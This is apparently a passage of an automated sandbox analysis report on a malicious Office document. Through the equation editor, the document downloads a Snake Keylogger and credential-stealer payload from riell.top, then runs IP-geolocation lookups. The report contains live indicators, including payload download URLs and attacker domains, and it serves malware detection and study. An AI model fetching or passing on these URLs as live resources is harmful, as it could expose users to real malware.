Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /obb.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: riell.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /obb.scr HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FFDE4C25-701B-4F27-93CB-2693CC173C87}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /obb.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: riell.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /obb.scr HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: riell.top
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002497000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: obi23456.scr, 0000000A.00000002.897811172.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002497000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: obi23456.scr, 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.898671670.0000000005A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.898671670.0000000005A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000240E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: obi23456.scr, 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
Source: EQNEDT32.EXE, 00000008.00000003.373161386.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, riell.top.url.0.dr	String found in binary or memory: https://riell.top/
Source: obb.doc.url.0.dr	String found in binary or memory: https://riell.top/obb.doc
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000003.373161386.000000000059F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riell.top/obb.scr
Source: EQNEDT32.EXE, 00000008.00000003.373161386.000000000059F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riell.top/obb.scrMC:
Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riell.top/obb.scrhhC:
Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riell.top/obb.scri
Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riell.top/obb.scrj
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.obi23456.scr.31b7b70.6.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.780000.2.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.780000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.21b9714.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
